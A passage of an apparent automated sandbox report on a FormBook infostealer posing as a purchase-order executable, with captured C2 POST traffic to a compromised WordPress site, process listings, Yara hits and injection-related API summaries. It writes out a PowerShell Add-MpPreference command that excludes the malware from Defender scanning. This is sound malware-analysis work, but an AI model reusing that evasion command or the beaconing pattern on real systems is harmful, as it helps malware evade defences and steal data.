6e 6d 62 5a 72 51 59 49 6f 53 51 4c 47 78 35 65 30 53 35 59 43 54 61 45 46 57 79 61 39 6a 51 6a 57 6b 74 50 79 46 4d 69 4b 69 4a 44 65 6e 44 5a 64 62 69 65 45 52 46 7a 62 4f 70 6c 73 62 55 3d Data Ascii: iJiX_=Yqre96Rq2GrWDSs0SZdsGTTqdOUCGVMeUhWqdcLb3o4v8XtkJSpzNMOm2Vq8A5vqJGfAdcRWYkgLqGxMKHYA6H6DJ+9hqtlhnfScmkzfOdZxxYdak3UTY1S6nACNpAq9L68rJRV3nmbZrQYIoSQLGx5e0S5YCTaEFWya9jQjWktPyFMiKiJDenDZdbieERFzbOplsbU=
Jul 3, 2024 08:37:11.159235954 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Jul 2024 06:37:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress CF-Cache-Status: DYNAMIC Set-Cookie: _cfuvid=HzA0L_VG2BvUmxqqNGFNalJCgeYumQ6ur4ZeQLs2dC8-1719988631107-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnly Server: cloudflare CF-RAY: 89d4dd8f0c2543a6-EWR Content-Encoding: gzip Data Raw: 34 39 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 56 db 8e db 36 10 7d f6 7e c5 44 41 f3 50 94 a6 bd 49 8a 42 2b 7b 91 b4 45 5a a0 97 00 db 22 e8 d3 82 12 c7 12 b3 14 47 25 29 cb 4e 91 7f 2f 28 52 5e 6d 76 13 20 89 5f 64 0d e7 76 e6 0c 8f 5d 3c fa e9 cf 1f ff fa e7 f5 cf d0 f8 56 6f cf 8a f0 00 2d 4c bd c9 d0 b0 bf af b2 ed d9 a2 68 50 c8 ed d9 62 51 b4 e8 05 18 d1 e2 26 db 2b 1c 3a b2 3e 83 8a 8c 47 e3 37 d9 a0 a4 6f 36 12 f7 aa 42 36 be 64 1f 46 59 2a c9 bb 59 8c 21 65 24 1e be 03 43 3b d2 9a 86 0c f8 18 e4 95 d7 b8 bd f2 b8 13 86 e0 95 e8 1d 3c 69 a5 70 cd 05 fc 48 ad 32 35 5c 11 99 82 47 bf 10 e1 2a ab 3a 0f ce 56 9b ac f1 be cb 39 77 31 bc 16 bd 5b 56 d4 f2 a1 63 ca 54 ba 97 e8 f8 5b c7 df fe db a3 3d a6 c7 f2 ad cb b6 05 8f 59 62 42 7f d4 08 fe d8 e1 26 f3 78 f0 bc 72 2e db 7e 0b ff 9d 01 00 94 74 60 4e bd 53 a6 ce a1 24 2b d1 b2 92 0e 17 e3 19 6b e9 1d fb a4 c3 80 e5 8d f2 1f f5 79 7f 76 56 92 3c 4e a5 44 75 53 5b ea 8d 64 15 69 b2 39 0c 8d f2 18 53 25 4b a9 45 75 13 2d b4 47 bb d3 34 b0 43 0e [TRUNCATED] Data Ascii: 494V6}~DAPIB+{EZ"G%)N/(R^mv _dv]<Vo-LhPbQ&+:>G7o6B6dFYY!e$C;<ipH25\G:V9w1[VcT[=YbB&xr.~t`NS$+kyvV<NDuS[di9S%KEu-G4CM?RUm*4muZsiLW#Koa9W}3Z&T-a}){Dc'gallr-g.nGZtZM)SK=RiRu#)3U+j\|`>uwGZ;aE!i<uz?e2JMSvsX?3\|BO.c0)<=?hX[aV
Jul 3, 2024 08:37:11.159255028 CEST	596	IN	Data Raw: d5 f5 7a f4 4a e7 56 98 89 4b a1 35 ac 96 e7 0e 50 b8 14 de 3b b4 cc a1 c6 ca cf b3 ee d1 7a 55 09 3d 35 d3 2a 29 75 3a 1b a7 c9 5c 27 aa 91 9e 70 41 22 bb ce 0b df 3b d6 a2 73 a2 c6 44 f4 69 b6 31 f9 fb 82 8f 82 11 a4 63 b1 58 14 5a 99 1b b0 a8 Data Ascii: zJVK5P;zU=5*)u:\'pA";sDi1cXZ7hv<;8^rdeg9p5FMd,+.<I+I%7YEV(mI,RD:u}RY4LY/Y:+yrTn0b6Gs

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.8	61471	66.235.200.146	80

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:37:13.726578951 CEST	772	OUT	POST /0rsk/ HTTP/1.1 Host: www.stefanogaus.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 226 Content-Type: application/x-www-form-urlencoded Origin: http://www.stefanogaus.com Referer: http://www.stefanogaus.com/0rsk/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 59 71 72 65 39 36 52 71 32 47 72 57 44 78 30 30 42 71 46 73 4e 54 54 70 57 75 55 43 4a 31 4e 56 55 68 4b 71 64 64 65 41 32 64 6f 76 2f 79 52 6b 49 54 70 7a 49 4d 4f 6d 2b 31 72 34 65 4a 76 66 4a 47 61 31 64 65 46 57 59 6e 63 4c 71 44 56 4d 4b 30 77 44 37 58 36 42 44 75 39 6a 33 64 6c 68 6e 66 53 63 6d 6b 6e 31 4f 5a 4e 78 77 6f 4e 61 6b 57 55 53 56 56 53 35 69 77 43 4e 6a 67 71 35 4c 36 38 64 4a 56 30 59 6e 6a 58 5a 72 53 41 49 6f 41 34 49 50 78 35 59 37 79 34 4b 50 57 6e 2b 43 58 2b 2b 34 42 67 78 56 45 59 30 36 54 68 49 51 41 42 46 64 6e 72 79 64 59 4b 6f 42 6d 59 62 42 74 35 56 79 4d 41 76 63 62 65 4f 72 41 33 32 51 6a 4d 71 43 59 47 38 30 73 77 73 Data Ascii: iJiX_=Yqre96Rq2GrWDx00BqFsNTTpWuUCJ1NVUhKqddeA2dov/yRkITpzIMOm+1r4eJvfJGa1deFWYncLqDVMK0wD7X6BDu9j3dlhnfScmkn1OZNxwoNakWUSVVS5iwCNjgq5L68dJV0YnjXZrSAIoA4IPx5Y7y4KPWn+CX++4BgxVEY06ThIQABFdnrydYKoBmYbBt5VyMAvcbeOrA32QjMqCYG80sws
Jul 3, 2024 08:37:14.407061100 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Jul 2024 06:37:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress CF-Cache-Status: DYNAMIC Set-Cookie: _cfuvid=7vZ0TPxp2dfdC1QikTRwrnCZPtzWQi9yVN2T0156zi4-1719988634359-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnly Server: cloudflare CF-RAY: 89d4dda3598a19d7-EWR Content-Encoding: gzip Data Raw: 34 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 56 db 8e db 36 10 7d f6 7e c5 44 41 f3 50 94 a6 bd 49 8a 42 2b 7b 91 b4 45 5a a0 97 00 db 22 e8 d3 82 12 c7 12 b3 14 47 25 29 cb 4e 91 7f 2f 28 52 5e 6d 76 13 20 89 5f 64 0d e7 76 e6 0c 8f 5d 3c fa e9 cf 1f ff fa e7 f5 cf d0 f8 56 6f cf 8a f0 00 2d 4c bd c9 d0 b0 bf af b2 ed d9 a2 68 50 c8 ed d9 62 51 b4 e8 05 18 d1 e2 26 db 2b 1c 3a b2 3e 83 8a 8c 47 e3 37 d9 a0 a4 6f 36 12 f7 aa 42 36 be 64 1f 46 59 2a c9 bb 59 8c 21 65 24 1e be 03 43 3b d2 9a 86 0c f8 18 e4 95 d7 b8 bd f2 b8 13 86 e0 95 e8 1d 3c 69 a5 70 cd 05 fc 48 ad 32 35 5c 11 99 82 47 bf 10 e1 2a ab 3a 0f ce 56 9b ac f1 be cb 39 77 31 bc 16 bd 5b 56 d4 f2 a1 63 ca 54 ba 97 e8 f8 5b c7 df fe db a3 3d a6 c7 f2 ad cb b6 05 8f 59 62 42 7f d4 08 fe d8 e1 26 f3 78 f0 bc 72 2e db 7e 0b ff 9d 01 00 94 74 60 4e bd 53 a6 ce a1 24 2b d1 b2 92 0e 17 e3 19 6b e9 1d fb a4 c3 80 e5 8d f2 1f f5 79 7f 76 56 92 3c 4e a5 44 75 53 5b ea 8d 64 15 69 b2 39 0c 8d f2 18 53 25 4b a9 45 75 13 2d b4 47 bb d3 34 b0 43 0e [TRUNCATED] Data Ascii: 49fV6}~DAPIB+{EZ"G%)N/(R^mv _dv]<Vo-LhPbQ&+:>G7o6B6dFYY!e$C;<ipH25\G:V9w1[VcT[=YbB&xr.~t`NS$+kyvV<NDuS[di9S%KEu-G4CM?RUm*4muZsiLW#Koa9W}3Z&T-a}){Dc'gallr-g.nGZtZM)SK=RiRu#)3U+j\|`>uwGZ;aE!i<uz?e2JMSvsX?3\|BO.c0)<=?hX[aV
Jul 3, 2024 08:37:14.407605886 CEST	591	IN	Data Raw: d5 f5 7a f4 4a e7 56 98 89 4b a1 35 ac 96 e7 0e 50 b8 14 de 3b b4 cc a1 c6 ca cf b3 ee d1 7a 55 09 3d 35 d3 2a 29 75 3a 1b a7 c9 5c 27 aa 91 9e 70 41 22 bb ce 0b df 3b d6 a2 73 a2 c6 44 f4 69 b6 31 f9 fb 82 8f 82 11 a4 63 b1 58 14 5a 99 1b b0 a8 Data Ascii: zJVK5P;zU=5*)u:\'pA";sDi1cXZ7hv<;8^rdeg9p5FMd,+.<I+I%7YEV(mI,RD:u}RY4LY/Y:+yrTn0b6Gs

Target ID:	0
Start time:	02:33:04
Start date:	03/07/2024
Path:	C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe"
Imagebase:	0x410000
File size:	800'256 bytes
MD5 hash:	0A4B0AD0F1B172ACACB64B09CF6E4277
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:33:05
Start date:	03/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe"
Imagebase:	0xef0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:33:05
Start date:	03/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:33:05
Start date:	03/07/2024
Path:	C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe"
Imagebase:	0x8e0000
File size:	800'256 bytes
MD5 hash:	0A4B0AD0F1B172ACACB64B09CF6E4277
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1608845942.00000000016E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1608845942.00000000016E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1607201928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1607201928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1608954398.0000000001720000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1608954398.0000000001720000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:33:19
Start date:	03/07/2024
Path:	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe"
Imagebase:	0x4e0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3848399247.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3848399247.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	02:33:20
Start date:	03/07/2024
Path:	C:\Windows\SysWOW64\unregmp2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\unregmp2.exe"
Imagebase:	0xf00000
File size:	214'528 bytes
MD5 hash:	51629AAAF753C6411D0B7D37620B7A83
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3848068617.0000000000D70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3848068617.0000000000D70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3847970736.0000000000D30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3847970736.0000000000D30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	02:33:33
Start date:	03/07/2024
Path:	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe"
Imagebase:	0x4e0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3851020084.0000000005020000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3851020084.0000000005020000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	02:33:45
Start date:	03/07/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6d20e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	268
Total number of Limit Nodes:	15

Executed Functions

Function 04E724B0 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1414915850.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e70000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8b7179e02a115f3e121dc9dfc96818dd83222fd7e96f6e296791ad7540a7744
Instruction ID: a1005e938581ac07706cf0dc3d617a768723cae7b522e0e4038cfa966460e647
Opcode Fuzzy Hash: f8b7179e02a115f3e121dc9dfc96818dd83222fd7e96f6e296791ad7540a7744
Instruction Fuzzy Hash: E8A1AD35E0030ACFDB01DFA4D8549DDFBBAFF89310F158256E515AB2A4EB30A985CB50

Function 04E70584 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1414915850.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e70000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab515370cb1c4699e298e95bddf91762614818dd634614a00fe6293908290434
Instruction ID: 6de430f3ec5b3d1f5a2551fc9daa5b73434db7394c99810a7bdf9870e3505eeb
Opcode Fuzzy Hash: ab515370cb1c4699e298e95bddf91762614818dd634614a00fe6293908290434
Instruction Fuzzy Hash: 16A19F35E0031ACFDB04EFA0D8549DDB7BAFF89310F148255E515AB3A4EB31A985CB50

Function 00D8D858 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00D8D8D6
GetCurrentThread.KERNEL32 ref: 00D8D913
GetCurrentProcess.KERNEL32 ref: 00D8D950
GetCurrentThreadId.KERNEL32 ref: 00D8D9A9

Strings

PgM., xrefs: 00D8D874

Memory Dump Source

Source File: 00000000.00000002.1403797213.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d80000_Siparis.jbxd

Similarity

API ID: Current$ProcessThread
String ID: PgM.
API String ID: 2063062207-1053831580
Opcode ID: 6c183dd607718cc2f94a339a049b21bbed68c5eb6807067d3a99110c1c3c4b2a
Instruction ID: 3ed0ba0ece3769b50aece65b7b5fcf558a969ccbb4555fc1661fa5e6666f6a09
Opcode Fuzzy Hash: 6c183dd607718cc2f94a339a049b21bbed68c5eb6807067d3a99110c1c3c4b2a
Instruction Fuzzy Hash: AD5148B09007099FDB14EFAAD548BDEBBF1EF88314F248059E419A7390D774A944CF66

Function 06C35C9C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06C35EDE

Strings

PgM., xrefs: 06C35CE3
PgM., xrefs: 06C35D12

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID: CreateProcess
String ID: PgM.$PgM.
API String ID: 963392458-2111499201
Opcode ID: a88767a79287db53368c3d99f67f495f8c1115ecd6596f613095dda87c6d6258
Instruction ID: 56818f90422e76fcf34c87562153a717f1e803dad7ff60ae5d42f54463d2d339
Opcode Fuzzy Hash: a88767a79287db53368c3d99f67f495f8c1115ecd6596f613095dda87c6d6258
Instruction Fuzzy Hash: 7AA15A71D00729CFEB54DF68C8407EEBBB2BF48310F5485A9E859A7280DB749A85CF91

Function 06C35CA8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06C35EDE

Strings

PgM., xrefs: 06C35CE3
PgM., xrefs: 06C35D12

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID: CreateProcess
String ID: PgM.$PgM.
API String ID: 963392458-2111499201
Opcode ID: bc901ead7ff3ab9c0544ba53f120c7a22c53bf70ce2edfa3cbf00fd8b16dc08c
Instruction ID: 336db3e5a5e1c5d621f3d895a772aacb76ae0dbc23bb2b864ec6c1db2c6ebe5a
Opcode Fuzzy Hash: bc901ead7ff3ab9c0544ba53f120c7a22c53bf70ce2edfa3cbf00fd8b16dc08c
Instruction Fuzzy Hash: 56915A71D007298FEB50DFA8C8417DEBBB2BF48310F5485A9E809A7280DB749A85CF91

Function 04E721C5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04E722E2

Strings

PgM., xrefs: 04E7221E
PgM., xrefs: 04E721FE

Memory Dump Source

Source File: 00000000.00000002.1414915850.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e70000_Siparis.jbxd

Similarity

API ID: CreateWindow
String ID: PgM.$PgM.
API String ID: 716092398-2111499201
Opcode ID: 7fbd9ca80f017011fa4263f75636fe97bdb180e1885387692dfe9b8573572ca0
Instruction ID: 5724dcb894fd43d120366cf772056c147afd032928ece60d1cc6646329155412
Opcode Fuzzy Hash: 7fbd9ca80f017011fa4263f75636fe97bdb180e1885387692dfe9b8573572ca0
Instruction Fuzzy Hash: DF51C2B1D00349EFDB14CFA9C884ADEBBF5BF48314F24816AE919AB210D771A845CF91

Function 04E721D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04E722E2

Strings

PgM., xrefs: 04E7221E
PgM., xrefs: 04E721FE

Memory Dump Source

Source File: 00000000.00000002.1414915850.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e70000_Siparis.jbxd

Similarity

API ID: CreateWindow
String ID: PgM.$PgM.
API String ID: 716092398-2111499201
Opcode ID: b3d579dd2345604b8192b1cbd29d459d1cf675376160deb315623378ba6c77f2
Instruction ID: edd3d1980af449d03d13422d7360de255d590efff77924d0088c8c3f6fb01acd
Opcode Fuzzy Hash: b3d579dd2345604b8192b1cbd29d459d1cf675376160deb315623378ba6c77f2
Instruction Fuzzy Hash: 2041C2B1D00349DFDB14CFAAC884ADEBBF5BF48314F24816AE919AB210D771A845CF91

Function 00D8B5BF Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00D8B826

Strings

PgM., xrefs: 00D8B7DF

Memory Dump Source

Source File: 00000000.00000002.1403797213.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d80000_Siparis.jbxd

Similarity

API ID: HandleModule
String ID: PgM.
API String ID: 4139908857-1053831580
Opcode ID: 3a8e71b5220468d0301164e98f96964fdc4018d79b500a6073935a9634a1b88b
Instruction ID: bf7d0d6fd005e0116c5efabcd48b555ae757bb1bf413f5306a31b5612b3d0ccf
Opcode Fuzzy Hash: 3a8e71b5220468d0301164e98f96964fdc4018d79b500a6073935a9634a1b88b
Instruction Fuzzy Hash: 84916870A00B059FDB24EF29D44175ABBF1FF88710F04892ED08ADBA50D775E846CBA1

Function 04E70684 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04E74861

Strings

PgM., xrefs: 04E747B7

Memory Dump Source

Source File: 00000000.00000002.1414915850.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e70000_Siparis.jbxd

Similarity

API ID: CallProcWindow
String ID: PgM.
API String ID: 2714655100-1053831580
Opcode ID: 3967f91cc159fb8fa611bdbf7bcace6d7d7bf355a0a266718b32d11f2a170b58
Instruction ID: 16fede35efb80dfc1bb2cd556c333b80f0ba812b2287a655ac70598cc8d67cb9
Opcode Fuzzy Hash: 3967f91cc159fb8fa611bdbf7bcace6d7d7bf355a0a266718b32d11f2a170b58
Instruction Fuzzy Hash: FB411D74A00349DFDB14CF99C488A9ABBF5FF88324F15C459E519AB361D374A841CFA1

Function 00D84524 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00D85DC9

Strings

PgM., xrefs: 00D85D4C

Memory Dump Source

Source File: 00000000.00000002.1403797213.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d80000_Siparis.jbxd

Similarity

API ID: Create
String ID: PgM.
API String ID: 2289755597-1053831580
Opcode ID: e79253f0e4fbb7d38b2bf33be976bcd773b59adede48244abde7d91beaa4c1bb
Instruction ID: 6f9e2e8feadbbdc19043069bef26e0fd49509c32d00e26de81d762084827d2c7
Opcode Fuzzy Hash: e79253f0e4fbb7d38b2bf33be976bcd773b59adede48244abde7d91beaa4c1bb
Instruction Fuzzy Hash: 9D41BFB0C00719CBEB24DFA9D844BDEBBF5BF48704F24806AD508AB255DB756946CFA0

Function 00D85D0D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00D85DC9

Strings

PgM., xrefs: 00D85D4C

Memory Dump Source

Source File: 00000000.00000002.1403797213.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d80000_Siparis.jbxd

Similarity

API ID: Create
String ID: PgM.
API String ID: 2289755597-1053831580
Opcode ID: 14b4303fd52ac1a2120f8f2e1914efb040f549c9df82c549e5c2a7d09d955f1c
Instruction ID: 6b1f6a6ba61d9927c1b2637bfcb8e12a7e72483b23bb2bd8a44460746d47119c
Opcode Fuzzy Hash: 14b4303fd52ac1a2120f8f2e1914efb040f549c9df82c549e5c2a7d09d955f1c
Instruction Fuzzy Hash: 0441CEB0D00719CBEB24DFA9D8847DEBBF6BF48704F20806AD408AB255DB756946CF91

Function 06C35A1A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06C35AB0

Strings

PgM., xrefs: 06C35A3F

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: PgM.
API String ID: 3559483778-1053831580
Opcode ID: 5f391877a9bc293a8c209e34bf49413b2586ea7c2a6fe59932fb3f50714ad7d6
Instruction ID: f8787824fbe006d95c0cbefb021965dac8af226857dc0fd597ebd2d1b1b33b18
Opcode Fuzzy Hash: 5f391877a9bc293a8c209e34bf49413b2586ea7c2a6fe59932fb3f50714ad7d6
Instruction Fuzzy Hash: A72148729003199FDB10CFAAC8817EEBBF5FF48310F10842AE958A7240D7789944DBA0

Function 06C35A20 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

